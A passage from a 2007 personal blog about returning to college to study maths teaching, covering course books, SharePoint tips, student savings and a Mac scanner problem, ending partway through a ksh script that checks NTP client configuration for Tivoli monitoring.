* The decision tree, should you stay with the door you chose.

* The decision tree, should you decide to switch doors.

The red X-es show the option taken away by the host. The purple X-es show the option taken away by your own choice.

Yes, it's counter-intuitive, but switching doors after having one goat revealed IMPROVES your chances. Instead of having a 1:3 chance, you now have 2:3! Nice!

And this is why I think this problem would make a nice opener for a high school course on statistics. It stumps the kids, makes them curious and them amazes them :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

College curricula are -also- mixed bag

2007-09-19 07:35:00

About a week ago I remarked how college books are mixed bag. Some of them seem really good, though others are almost crap.

Well, the whole mixed bag deal also goes for the course curricula themselves apparently. On Monday a big discussion broke out during SLB1 about the courses' contents. Marjan thought there was too little theory, Karin though teaching by examples is great, Wouter though the maths was too easy, Badegul thought the maths were too complicated. And here I was, loving all of college, thinking everything's just right. (transcription)

The points me and Hans tried to make were these:

* College has to cater to the lowest, common denominator. During their first year they have to take a whole bunch of -very- different people and ready them for the following years. You simply can't be very specific in your teachings during the first year.

* Isn't college about going out and finding the answers for yourself? If an assignment uses terms that you don't understand, shouldn't you go investigate? Or at least talk to the docent?

At least it's good to know that I'm not the only one still adjusting to college :D


kilala.nl tags: , ,

View or add comments (curr. 0)

Kilalapedia: A wiki for all my class notes

2007-09-18 14:19:00

I've made it a habbit to always take notes during class. All of these notes are taken on my laptop, because copying them from paper to my PC is very inefficient. Luckily, so far noone has object to the presence of my laptop in class.

I thought it'd be useful for both me and my class mates if I put up all these notes on my website. However, since making menu entries for each course would make a big mess, I've decided to put everything in a Wiki.

Please feel free to visit my schoolwork Wiki.


kilala.nl tags: , ,

View or add comments (curr. 0)

Basic ICT skills: Powerpoint Presentation And Slidecast

2007-09-18 08:16:00

Every freshman at Hogeschool Utrecht is required to take a class in Basic ICT skills. The class teaches both young and old about the learning infrastructure in place at HU. Classes cover everything from using Powerpoint and Word, to using the online tools Sharepoint and Osiris.

While I fully agree that this course is an important one, I do feel it's a bit wasted on me. I've been in IT for seven years now! ^_^ I've worked with Sharepoint on at least two occasions before and Osiris is really quite simple if you RTFM.

Since the Basic ICT skills class interferes with two of my other classes, I'm trying to get a Get out of jail free! card. I've spoken with my mentor at school and she asked me to do one of the bigger assignments: a Powerpoint presentation introducing myself. Naturally I complied, seeing as how I'll have to give presentations later on in the school year as well. Might as well create the master slides and templates now, right? ;)

And here it is! Sorry 'bout the dutch, all you USAdians...

Click here for the introduction.

EDIT:
Hmm... The text is quite illegible in the clip that's shown on this page. Things are much better if you download the clip and watch it on its own. You can download it from here, by grabbing IntroThomas.mov.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Course books: they're a mixed bag

2007-09-11 19:33:00

How is it possible for one book to be both highly educational and (IMNSHO) absolutely craptacular at the same time? Case in point: Lesgeven en zelfstandig leren by Geerlings and Van Der Veen.

This course book covers basic didactics of teaching at the high school level. It covers all kinds of interesting subjects and I feel that there's a lot for me to learn.

Unfortunately the book's laced with three things that irk me.

1. To me it seems that the authors often skim over stuff that could be very interesting. Instead of taking an analytical, or academic approach, they fill chapters with examples and stories. There's nothing wrong with examples, but neither is there with pure psychology.

2. The book feels outdated and like it was written by cuddly-fluffy psychologists. The kind who want to pamper kids and feel that they should be let free to explore their youth and possibilities. *cue Care Bear song* Seriously, I'm all for letting kids discover what they can and can't do, but I believe that in the end kids also need structure and hierarchy. Besides, the original print was written in the eighties D:

3. Their writing is atrocious at times. At the beginning of chapter five there's a sentence that runs for a full -ten- lines! It runs a hundred and thirty words in length! What the fsck were they thinking?

And then there's pure genius like this:

In reality, assessing the beginning situation [of a student] is done based on 'experience'. This is a conglomerate of pedagogic-didactical knowledge and intuition.

/me shakes head

/me goes back to studying


kilala.nl tags: , , ,

View or add comments (curr. 7)

Tips and tricks for Microsoft Sharepoint

2007-09-11 14:42:00

Like many other companies and organizations, Hogeschool Utrecht uses specialized software for to facilitate collaboration between students and faculty. HU makes use of Microsoft Sharepoint, which is a web based toolset. Sharepoint is pretty damn versatile in what it can do for you, though we'll only used the most rudimentary functions.

Unfortunately, all those functions tend to make Sharepoint a little bit unwieldy. Kind of like how MS Office is bloated as well. On this page I'll gather tips and tricks that should make using Sharepoint just little bit easier.

Securing your shared folders

You will be storing a lot of your school work in the Shared Documents folders on Sharepoint. That way teachers and faculty will be able to read and download your work. However, it's only natural that you don't want all of your fellow students to rifle through your stuff. That's why setting access permissions is important.

Here's how you can secure a folder that holds your school work.

  1. Create a new folder. Do this by clicking the arrow on the Create button and selecting New folder.
  2. A new window appears. Enter a name for the new directory and confirm.
  3. The directory has been created!
  4. Hold your mouse over the name of the directory, but don't click. You should see an arrow appear next to the name. Click it.
  5. From the list, select Manage Permissions.
  6. A new window appears. It shows four classes of people who can get access to the directory. To secure the directory you should have the following permissions in place:
    • HVU Medewerkers: Read
    • HVU Studenten: Limited access
    • System Account: Limited access
    • <You>: Full Control
  7. You can change the permissions for one class by clicking on its name. You can then modify the settings in a new screen.
  8. Once all permissions are set as you want, you're done. You won't have to click anything because the permissions are already active.

Copying multiple files at the same time

Sharepoint is great because it lets you access all your files and information through a web browser. Unfortunately this interface sucks when you want to copy a lot of files and directories at the same time. Luckily, there -is- a way to do it easily. The downside is that this requires Windows 2000 (or higher) and Internet Explorer 6 (or higher).

The method we'll use to copy loads of files is called the Explorer View. It allows you to open your Sharepoint directories in Windows Explorer. That's the same piece of software you use to work with files and directories on your PC.

  1. Open your Sharepoint page.
  2. Go into the directory where you want to upload files.
  3. In the menu bar of this folder select Actions -> Open with Windows Explorer, or Open in Explorer View.
  4. A new window will open up that gives you Explorer access to your directory.

If that doesn't work, try it as follows.

  1. Open your Sharepoint page.
  2. Go into the directory where you want to upload files.
  3. In the menu bar of this folder select Settings -> Document Library Settings.
  4. Scroll down until you find the heading Views. Below that header you'll see a link called Explorer View. Click it.
  5. On the next screen, don't change anything. Just click OK.
  6. Wait a moment while Internet Explorer is processing the Explorer View.
  7. Your IE window now contains the Windows Explorer view of your document directory.

You can now drag files from your computer into this view. You can also create new directories much easier. And if you want you can copy a whole directory tree in there!

Attention Mac OS X people!

You -can- use Firefox or Safari to access Sharepoint. However, many of the advanced features will not work, like the MS Office integration. Luckily, most of those features are crap anyway so you won't use them ^_^ Sadly, the Explorer View does -not- work in these browsers, since it requires Internet Explorer 6+. For that feature, you'll need to use Windows. Or just live without the EV.

If you happen to be using Windows inside a Parallels virtual machine, then there's one nasty glitch with the Explorer View. Mac OS X automatically creates hidden files inside each directory, called .DStore. When you're copying a whole directory, these files will cause your copy to fail. It's better to create the directory and then copy all files in it to the Sharepoint directory manually.

Freeing up storage space

Over at the HU each student is assigned 100 MB of storage space for their files on Sharepoint. Once your space runs out you won't be able to add any new stuff. That would be bad, because you'll need to be able to upload new schoolwork. Right?

One tricky part about Sharepoint is that, if you erase a file, it isn't really gone yet. Just like on your PC, Sharepoint keeps your trash in a trashcan that needs to be empty. And unfortunately the size of the trashcan also weighs in against your storage space.

So if you start getting e-mails from Sharepoint, warning you about your space usage, click on the link in the mail. That will take you to your usage report page. On that page you will also find a link to your trashcan. Click it and remove all of the files in the trash. And presto! Your Sharepoint site can breathe again!


kilala.nl tags: , , ,

View or add comments (curr. 0)

What? I've already got school results and grades?

2007-09-11 12:49:00

A modded screenshot of Osiris

Well, that was a surprise! I was dicking around in Osiris, the online student management toolset at HU. Enrolling in a few classes, signing up for tests and term papers, just generally looking around and exploring.

After clicking the Results button I was greeted with a big list. But how is it possible that I already have grades?! I just started school a week ago!

Then I took a closer look at the dates. Apparently my student number isn't the only thing that carried over to my new college enrollment ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

Slugging through my homework

2007-09-08 19:10:00

Wow, this is a lot of work :)

Yesterday I raced through a large part of my first dossier assignment for Statistics 1. The didactical part of the course, that is. I'm about halfway through that assignment, though what remains will take more effort than what I did yesterday.

How do I know this? Because the second part of that assignment requires that I work through each maths assignment that I picked for my report. And judging by today's progress through the other part of Statistics 1 (the real maths), I'm going to need a long while.

My homework for Monday said that I'd need to study paragraphs 1.0-1.3 and 1.4-1.6. Sounds rather simple right? Well, it looks it too, since each paragraph is only two pages. However, looks can be deceiving since so far I've needed about an hour-and-a-half per paragraph! Ouch!

Talk about underestimating the workload! Tonight's gonna be an all-nighter.

Luckily, productivity blog LifeHacker provided me with something useful today! They posted about the why and how behind power naps. I took one this afternoon before studying and I'll take another one around 20:00.

EDIT:

Meanwhile, the cat's asleep on her pillow. She's actually snoring! That's so cute! <3


kilala.nl tags: ,

View or add comments (curr. 1)

Getting my Canon scanner to work (n650u on Mac OS X)

2007-09-05 21:45:00

Please let the record state that Canon are a bunch of f-ing toolboxes when it comes to their scanners. More specifically, when it comes to using their scanners in Mac OS X. Some of their older models are completely unusable, although there are tricks, rituals and voodoo that may get you varying results.

I've fought a few times to get my N650u to work.

I need to scan some stuff for school. Since I cannot drag along my Powermac (which runs the Classic Canon tools) I've fought my Macbook for an hour or so tonight. I tried all the crap that's out there, but Canon's software's crap. So I caved in and bought Vue Scan. Thankfully it's come down in price since the last time I wrote about it.

At least I can use the bill for VueScan to get a tax write-off, since it was a purchase made for school. *sigh*


kilala.nl tags: , ,

View or add comments (curr. 0)

Holy shit! That's a lot of work!

2007-09-04 22:14:00

A screenshot from Schoolhouse 2

Holy crap! I just entered all of my homework and such for the following few weeks. The screenshot to the left is my current ToDo list in Schoolhouse 2. You probably can't see it very clearly, but it boils down to the following.

Due in one week -> Read about five chapters, make all relevant assignments.

Due in two weeks -> Read about six chapters, make all relevant assingments. WRITE FIVE REPORTS!

Crickey!

Now I'm off to bed. For now I'll stick to a regimen where I do schoolwork both before and after my normal, sysadmin work. So there's a bit in the early morning and the rest is between 1900 and 2200.

Like I said earlier today: I've good reason to be nervous!


kilala.nl tags: ,

View or add comments (curr. 0)

What a day! My first day at school

2007-09-04 10:34:00

Satelite view of my school

Wow! I'm feeling exhilarated! This whole going-back-to-school thing rocks ^_^

Yesterday was my first day at Instituut Archimedes, following classes from 12:00 until 21:45. As I mentioned earlier, this semester's roster entails four classes: Statistics 1 (math and didactics), Study Guidance and Math didactics 2. I'm very lucky to have a break between 18:00 and 20:00, giving me time to get started on homework and have some dinner.

The folks at school all seem quite nice. The teachers are cool and usually in their thirties. My classmates range between 21 and 56, though there's one daunting thing about them: over 80% of them are already in education. O_O

So yea, that's a little intimidating. Being one of the few who have no teaching experience whatsoever and who don't currently hold a teaching position. That second part is really important for classes that need me to do project in a teaching environment. Where the heck am I going to find a bunch of thirteen year olds, just to try some teaching methods on them?!

Aside from the exhilaration, there's also nervousness. I'd already mentioned it before, but it's still there. The feeling that I -know- that I can fail at what I'm doing here. The feeling that I'm treading completely new ground. The feeling that I'm getting in over my head. Mind you, I'm still loving it, but that doesn't mean I don't feel the fear :)

About the workload... I was prepared for (and expected) a lot of work. However, it seems that I underestimated things a little. Aside from working 32 hours a week for Snow I will also need to spend about 40 hours per week to earn my ten credits this semester. The basic math: 1 ECT equals about 28 hours of work. Three of my courses are good for hard credits: 10 ECTS in total. So in about seven weeks I'll have to shift 280 hours of work. Ouch! Goodbye social life! :)

Ah well... First, let's see how hard things really are.

In the meantime Marli is a great value to me, giving me loadses of support! The fact that she's so proud of me and has faith in me really means a lot!


kilala.nl tags: , ,

View or add comments (curr. 2)

Using Moderne Wiskunde Helpdesk with Mac OS X or Linux

2007-09-04 07:01:00

A lot of students, both high school and college, use the Moderne Wiskunde books to study maths. These books include CD-ROMs that should aid the student in comprehending the new material. The contain various Flash animations per subject, as well as a number of tests and assignments.

Sounds good right? Were it not for the fact that these CD-ROMs only work properly in Windows. I've verified it this morning: while all of the contents are web apps, they are written purely for Windows XP and Internet Explorer.

Not even the combination Windows + Firefox works, since apparently Wolters Noordhoff only use specific IE commands to work with Flash. If there is such a thing. The software wouldn't work in my Firefox, complaining about the Flash version.

As one can expect I also tried to run the CD in Mac OS X. This can be done by inserting the CD and then directing Safari to open $CD/dlo/index.htm. This part of the procedure works as expected, as can be seen from the screenshot above. However, when you attempt to start an animation it all goes to dust. No dice. I just get a blank screen.

Seriously, how hard could it be to re-write a fricking web application to work with non-Windows, non-IE systems? *sigh* I've e-mailed W-N for comments. Let's see if they'll react. Their website also sucks in Safari, clearly written for Windows-folks as well. :(

For now the only way to run this software properly on a Mac is either by installing Bootcamp, Parallels, or VMWare. You can then run Windows in a secured and tucked away place.



Follow-up: W-N answer my question

Updated on the 6th of september, 2007.

I've received an e-mail from the Wolters Noordhoff helpdesk. They inform me that they are aware of the compatibility issues when using anything but Internet Explorer on Windows.

They also inform me that they -are- indeed working on making all their software and websites W3c standards-compliant. However, this process will take a lot of time, since there's just so much code to go through. So unfortunately, for the next few years I guess, we'll be stuck with IE.

One tip they gave me: the first thing they'll start reworking so it fits all the standards are the online study resources. Getal en ruimte makes use of a bunch of online aids and tools and these will be recoded ASAP. These tools can be found at the method's website.



Follow-up 2: W-N publish their new I-Clips

Updated on the 9th of october, 2007.

This year, Wolters-Noordhoff published the latest edition of the Moderne Wiskunde series: version 9. A new feature for this method is the inclusion of additional, online resources called I-Clips. These can be accessed through the W-N site, or through Schoolwise.nl

Ironically, even these new ICT features only work properly on a Windows system. On Mac OS X, in Safari the screen stay mostly empty while Firefox does show me some images, but goes run-away on the processor :(

Naturally I've sent N-W another e-mail about this.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Well, today's the first day of school!

2007-09-03 07:27:00

Wow! Today's the first day of school and it already feels rather different! I went to bed around 2130, read for an hour, then slept like a brick. And I woke around 0700, instead of the usual 0600 on workdays. This actually feels rather nice! Combine that with yesterday and I'm feeling rather relaxed!

You see, yesterday I was feeling really worked up because I hadn't studied yet, nor done any of my maths revision like I said I would. Too much time had gone into this site's redesign and after that I was just too busy socially. Of course, getting worked up in this case was counter productive: how much could I do in just a few hours?

So instead I decided to follow the sage advice of my wiffums and some of my friends: I relaxed. After taking Marli to work I went back to bed, read a lot, slept a bit and chomped away half a tube of Pringles. So yea, it may have been a "horrible" evening, but IMHO it was "great".

I'm sorry that I had to blow of Peter's invitation for a walk though. He was reaching out to me, but I didn't go. I'll go and visit them this week...


kilala.nl tags: ,

View or add comments (curr. 4)

Tips from Stef Heinsman, our director

2007-08-31 11:40:00

On the 30th of August 2007, Stef Heinsman opened the new academic year at Instituut Archimedes. All freshmen for the tweedegraads docent course attended an introductory meeting, welcoming them to their new school.

Surprisingly, our director/rector Stef Heinsman had some interesting tidbits for the crowd. It wasn't the expected, useless ramble :)

The three most important lessons from his own past:

  1. Always attend lectures and sessions.
  2. Don't postpone your work.
  3. Be stubborn when you can afford it.

By attending lectures you build a solid relationship, both with your teachers and your fellow students. You will also remain emerged into the whole spirit of school and teaching, ensuring your continued enthusiasm.

By not postponing your work, Stef is convinced that you will build confidence in your own competences. By taking the same tests and projects as your fellow students, at the same time, you will realize that they're in the same boat. Things may be hard for you, but there are other people in the exact same situation.

At times you'll be convinced that your own approach to a certain situation is the best one. Don't feel forced to take the teacher's approach and verify your own opinions. Become autonomous, allowing you to do your own work when you need to.

Combining these three factors will help you with your motivation. It's what you're going to need when things get a little rough around the edges.

In conclusion, Stef also asks us to take care of our selves. Don't lose your health, don't burn out and make sure that things are fine at home. Because the people at home are your strongest foundations.

He also suggested that you should teach something that you enjoy. By doing that you'll not only convey knowledge, but also enthusiasm!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Saving money as a student

2007-08-31 10:29:00

A money tree

Most of us students aren't rich. Part-time students like me timeshare between their job and their education, trying to find a balance. Freshmen straight out of high school usually have it even harder, getting by on crappy jobs instead of a real job. Most of us rely on government grants, or support from family. All in all, we don't have it easy getting by.

Unfortunately, once you've paid your tuition, you're not done yet! There's books, study supplies, software and hardware that you'll need. And all of that stuff costs money as well! Luckily there are some nice ways to get discounts or even free stuff!

Saving on books and syllabi

School books are, in general, pretty damn expensive. One of the maths books I need for my first semester rings in at around forty euros! I'm glad to say that it's possible to get better deals online. The Netherlands' largest, online bookstore Bol.com has gotten into a new market: second hand books.

In their 2eHANDS section they mediate between seller and buyer. People wanting to sell books can open an ad and name their price. Mind you, not all books on 2eHANDS are in pristine condition, some being down-right ragged. Buying books from 2eHANDS couldn't be easier since it uses the normal Bol.com ordering process. You add books to your shopping cart, you proceed to checkout and you pay Bol.com in the preferred manner. You won't have to worry about shipping, or talking to the seller: Bol.com takes care of all that.

I managed to save about seventy euros on an order that would've otherwise cost me almost three hundred euros. Result!

When it comes to syllabi (dictaten in dutch) things will be a little bit harder. These books are usually created, printed and published by the school itself and thus much harder to find. In a lot of cases the syllabi are a waste of paper, since you'll only use them a couple of times.

Thankfully, some syllabi are available digitally and for free! Search your school's Intranet or ask your teachers if they are aware of any digital copies.

Saving on software

As a student you'll be using a lot of different software to get through school. You'll be typing reports, researching new materials, trying to prove theorems, and so on. What a lot of people don't know is that a lot of software can be found very cheaply or even for free.

Saving on Microsoft Office

Most notable among the software you will use are the various Microsoft Office tools, like Word, Excel and Powerpoint. Of course, Microsoft's software is famously expensive! Paying through the nose, just to type up your reports is a bad idea. So here are a few alternatives!

First off, Surfspot.nl offers discounted software to most of the Netherlands' students. This way you can get an official and completely legal license for MS Office at around thirty euros! Absolutely amazing! Aside from Office, Surfspot also offers huge amount of other software, like Photoshop, web design tools and security software. It's really neat!

If you have a hearty dislike for all things Microsoft and want to use an office suite other than MS Office, take a look at the following. Apple's iWork rings in at around eighty euros and is very slick. It may not have all the thousands of features that Office does, but most of us won't even need them. If you're looking for something that's completely free, take a look at Open Office. As I said it's completely free and it's available for most modern operating systems!

If you're looking for a smaller and simpler editor for your reports, take a look at Mellel. This cheap piece of software was originally created for students, authors and researchers, so they could create reports in an orderly fashion. Apparently it's rather easy to use, yet it remains powerful.

Saving on other software

A lot of commercial software has either shareware or free, open source alternatives. Try using Google to search for some software. Or dig around websites like Version Tracker or Apple Downloads.

Saving on hardware

Since I'm of the Mac-persuasion, I'll open with Apple's deals. By shopping at the Apple education store you'll get a 10% discount off all hardware acquisitions. In my opinion the Macbook makes a great companion to any student. Getting a 10% discount makes it even better!

Some colleges and universities have laptop projects, where they strike a deal with a laptop vendor to get stuff on the cheap. For instance, Hogeschool Utrecht takes part in Notebookprojecten.nl. Those guys offer laptops and various peripherals at low prices. For instance, I just noticed an external LaCie hard drive (160gb, bus powered, usb2) for a hundred euros. That's pretty damn good!

So ask around your school, or check its Intranet. Maybe you're lucky as well!

The Money Tree image was borrowed from Thinkquest.org.


kilala.nl tags: , ,

View or add comments (curr. 0)

Teaching is popular. Maths even more so.

2007-08-31 07:00:00

Last night was the school year's official opening at Hogeschool Utrecht. Around 17:00 all aspiring tweedegraads teachers gathered in the cafeteria for a speech from the rector. It was interesting to see that the group was both large and varied. I reckon there were about a hundred people there, maybe one-twenty. Aged between twenty and somewhere in their fifties I saw a lot of caucasians, mixed in with a few turks and moroccans.

One startling realization was the fact that almost 50% of the group were there for the same degree I was after: tweedegraads maths teacher. I guess either it's a popular passtime, or people have caught on to the fact that maths teachers are sought after. All in all there's sixty people starting the maths course this year. Wow!

After the whole introduction and a tour of the school building (which we'll be leaving come January, to move to a new one) there were drinks. I finally got the chance to meet some of my fellow students. It's slightly daunting to know that a whole bunch of them are already in education, but I'm not going to let that get in my way :)

So far they seem like a nice bunch of people! There's the strong-and-silent guys, the rowdy drinking-after-playing-footbal guys, the silent-and-mousy women and so on. There was also this one woman (I think she's in her forties though I'm horrible at guessing ages) who's great! She's absolutely bubbling with enthusiasm for the course! Kind of like how I felt after my intake with the coordinator :)

Yes. This is going to be an interesting year!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

How cool is this? I'm still me!

2007-08-30 15:52:00

The letter that confirms my enrollment.

Heheh, this is so sweet. Not a few weeks ago was I wishing out loud that I'd get my old student number back, now that I'm returning to Hogeschool Utrecht

Lo and behold, today I get a letter that's part of my enrollment process. And what does it tell me? That my student number is good ol' 1018808. Sweet! I'm back to being me! ^_^


kilala.nl tags: , ,

View or add comments (curr. 3)

Tivoli script: check_ntpconfig.sh

2007-08-30 11:46:00

This script was written at the time I was hired by T-Systems.

This script is an evolution of my earlier check_ntp_config. This time it's meant for use with Tivoli, although modifying it for use with Nagios is trivial. The script was written to be usable on at least five different Unices, though i've been having trouble with Darwin/OS X.

The script was tested on Red Hat Linux, Tru64, HP-UX, AIX and Solaris. Only Darwin seems to have problems.

Just like my other recent Nagios scripts, check_ntpconfig.sh comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution.


#!/usr/bin/ksh
#
# NTP configuration check script for Tivoli.
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of T-Systems, CSS-CCTMO, the Netherlands
# Last Modified: 13-09-2007
# 
# Usage: ./check_ntp_config
#
# Description:
#   Well, there's not much to tell. We have no way of making sure that our 
# NTP clients are all configured in the right way, so I thought I'd make
# a Nagios check for it. ^_^ After that came this derivative Tivoli script.
#   You can change the NTP config at the top of this script, to match your
# own situation.
#
# Limitations:
#   This script should work fine on Solaris, HP-UX, AIX, Tru64 and some
# flavors of Linux. So far Darwin-compatibility has eluded me.
#
# Output:
#   If the NTP client config does not match what has been defined at the 
# top of this script, the script will echo $STATE_NOK. In this case, the 
# STATE variables contain a zero and a one, so you'll need to use a 
# "Numeric Script" monitor definition in Tivoli. Anything above zero is bad.
#
# Other notes:
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details.
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#

### SETTING THINGS UP ###
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
PROGNAME="./check_ntp_config"
STATE_NOK="1"
STATE_OK="0"

. /opt/Tivoli/lcf/dat/dm_env.sh >/dev/null 2>&1


### DEFINING THE NTP CLIENT CONFIGURATION AS IT SHOULD BE ###
NTPSERVERS="192.168.22.7 192.168.25.7 192.168.16.7"


### DEBUGGING SETUP ###
# Cause you never know when you'll need to squash a bug or two
DEBUG="1"

if [[ $DEBUG -gt 0 ]]
then
        DEBUGFILE="/tmp/thomas-debug.txt"
	if [[ -f $DEBUGFILE ]]
	then
            rm $DEBUGFILE >/dev/null 2>&1
	    [[ $? -gt 0 ]] && echo "Removing old debug file failed."
	    touch $DEBUGFILE
	fi
fi


### REQUISITE COMMAND LINE STUFF ###

print_usage() {
	echo ""
	echo "Usage: $PROGNAME"
}

print_help() {
	echo ""
	echo "NTP client configuration monitor plugin for Tivoli."
	echo ""
	echo "This plugin not developped by IBM."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
	echo ""
	print_usage
	echo ""
}

while test -n "$1" 
do
	case "$1" in
	  *) print_help; exit $STATE_OK;;
	esac
done


### DEFINING SUBROUTINES ###

function SetupEnv
{
    case $(uname) in
	Linux) 	CFGFILE="/etc/ntp.conf"; 
		IPCMD="host" 
		IPMOD="tail -1"
		NAMEMOD="tail -1"
		IPFIELD="4"
		NAMEFIELD="5" 
		GREP="egrep -e" ;;
	SunOS) 	CFGFILE="/etc/inet/ntp.conf"
		IPCMD="getent hosts"
		IPMOD=""
		NAMEMOD=""
		IPFIELD="1"
		NAMEFIELD="2"
		GREP="egrep -e" ;;
	Darwin) CFGFILE="/etc/ntp.conf"
		IPCMD="host"
		IPMOD=""
		NAMEMOD=""
		IPFIELD="4"
		NAMEFIELD="1"
		GREP="egrep -e" ;;
	AIX)    CFGFILE="/etc/ntp.conf"
		IPCMD="host"
		IPMOD=""
		NAMEMOD=""
		IPFIELD="3"
		NAMEFIELD="1"
		GREP="egrep -e" ;;
	HP-UX)  CFGFILE="/etc/ntp.conf"
		IPCMD="nslookup"
		IPMOD="grep ^\"Address\""
		NAMEMOD="grep ^\"Name\""
		IPFIELD="2"
		NAMEFIELD="2"
		GREP="egrep -e" ;;
	OSF1)   CFGFILE="/etc/ntp.conf"
		IPCMD="nslookup"
		IPMOD="grep ^\"Address\" | tail -1"
		NAMEMOD="grep ^\"Name\" |tail -1"
		IPFIELD="2"
		NAMEFIELD="2"
		GREP="egrep -e" ;;
	*) echo "Sorry. OS not supported."; exit 1 ;;
    esac

    FAULT=0

    if [[ $DEBUG -gt 0 ]]
    then
	echo "=== SETUP ===" >> $DEBUGFILE
	echo "OS name is $(uname)" >> $DEBUGFILE
	echo "CFGFILE is $CFGFILE" >> $DEBUGFILE
	echo "IPCMD is $IPCMD" >> $DEBUGFILE
	echo "IPMOD is $IPMOD" >> $DEBUGFILE
	echo "NAMEMOD is $NAMEMOD" >> $DEBUGFILE
	echo "IPFIELD is $IPFIELD" >> $DEBUGFILE
	echo "NAMEFIELD is $NAMEFIELD" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
	echo "NTPSERVERS is $NTPSERVERS" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi
} 

function ListInConf
{
    if [[ -z $NTPSERVERS ]]
    then
	echo "You haven't configured this monitor yet. Set \$NTPSERVERS."; exit 0
	[[ $DEBUG -gt 0 ]] && echo "NTPSERVERS variable not set." >> $DEBUGFILE
    else

    for HOST in $(echo $NTPSERVERS)
    do
    SKIPIP=0
    SKIPNAME=0

    if [[ $DEBUG -gt 0 ]]
    then
	echo "=== LISTINCONF ===" >> $DEBUGFILE
	echo "HOST is $HOST" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi

        if [[ -z $(echo $HOST | $GREP [a-z,A-Z]) ]]	    
        then
            IPADDRESS="$HOST"
	    TEST=$($IPCMD $HOST 2>/dev/null)

	    if [[ ( $? -eq 0 ) && ( -z $(echo $TEST | $GREP NXDOMAIN) ) ]] 
	    then
		[[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
            	HOSTNAME=$($IPCMD $HOST 2>/dev/null | $NAMEMOD | cut -f$NAMEFIELD -d" " | cut -f1 -d.)
	    else
		[[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
		HOSTNAME=""
	    fi

	    if [[ $HOSTNAME -eq "" ]]
	    then
	    	QUERY="$IPADDRESS"
	    	[[ $DEBUG -gt 0 ]] && echo "Skipping hostname verification" >> $DEBUGFILE
	    else
	    	QUERY="$HOSTNAME $IPADDRESS"	
	    	[[ $DEBUG -gt 0 ]] && echo "Checking both IP and name." >> $DEBUGFILE
	    fi
        else
            HOSTNAME="$HOST"
	    TEST=$($IPCMD $HOST 2>/dev/null)

	    if [[ ( $? -eq 0 ) && ( -z $(echo $TEST | $GREP NXDOMAIN) ) ]] 
	    then
		[[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
            	IPADDRESS=$($IPCMD $HOST 2>/dev/null | $IPMOD | cut -f$IPFIELD -d" ")
	    else
		[[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
		IPADDRESS=""
	    fi

	    if [[ $IPADDRESS -eq "" ]]
	    then
		QUERY="$HOSTNAME"
		[[ $DEBUG -gt 0 ]] && echo "Skipping IP address verification" >> $DEBUGFILE
	    else
		QUERY="$HOSTNAME $IPADDRESS"	
		[[ $DEBUG -gt 0 ]] && echo "Checking both IP and name." >> $DEBUGFILE
	    fi
        fi

    if [[ $DEBUG -gt 0 ]]
    then
	echo "IPADDRESS is $IPADDRESS" >> $DEBUGFILE
	echo "HOSTNAME is $HOSTNAME" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi

	for NAME in `echo $QUERY`
	do
       	    [[ -z $($GREP $NAME $CFGFILE | $GREP "server") ]] && let FAULT=$FAULT+1
	done

    done

    fi
}

function ConfInList
{
    NUMSERVERS=$($GREP ^"server" $CFGFILE | wc -l)

    if [[ $DEBUG -gt 0 ]]
    then
	echo "=== CONFINLIST ===" >> $DEBUGFILE
	echo "Number of \"server\" lines in $CFGFILE is $NUMSERVERS" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi

    if [[ $($GREP ^"server" $CFGFILE | wc -l) -gt 0 ]]
    then

	for HOST in $(cat $CFGFILE | $GREP ^"server" | awk '{print $2}')
	do
		if [[ $DEBUG -gt 0 ]]
		then
			echo "HOST is $HOST" >> $DEBUGFILE
			echo "" >> $DEBUGFILE
		fi
		if [[ -z $(echo $HOST | $GREP [a-z,A-Z]) ]]	    
		then
			IPADDRESS="$HOST"
	    		TEST=$($IPCMD $HOST 2>/dev/null)

			if [[ ( $? -eq 0 ) && ( -z $(echo $TEST | $GREP NXDOMAIN) ) ]] 
			then
			    [[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
            		    HOSTNAME=$($IPCMD $HOST 2>/dev/null | $NAMEMOD | cut -f$NAMEFIELD -d" " | cut -f1 -d.)
			else
			    [[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
			    HOSTNAME=""
	    		fi

			if [[ $HOSTNAME -eq "" ]]
			then
			    QUERY="$IPADDRESS"
			    echo "Skipping hostname verification" >> $DEBUGFILE
			else
			    QUERY="$HOSTNAME $IPADDRESS"	
			    [[ $DEBUG -gt 0 ]] && echo "Checking both IP and name." >> $DEBUGFILE
			fi
		else
			HOSTNAME="$HOST"
	    		TEST=$($IPCMD $HOST 2>/dev/null)

			if [[ ( $? -eq 0 ) && ( -z $(echo $TEST | $GREP NXDOMAIN) ) ]] 
			then
			    [[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
            		    HOSTNAME=$($IPCMD $HOST 2>/dev/null | $IPMOD | cut -f$IPFIELD -d" ")
			else
			    [[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
			    IPADDRESS=""
	    		fi

			if [[ $IPADDRESS -eq "" ]]
			then
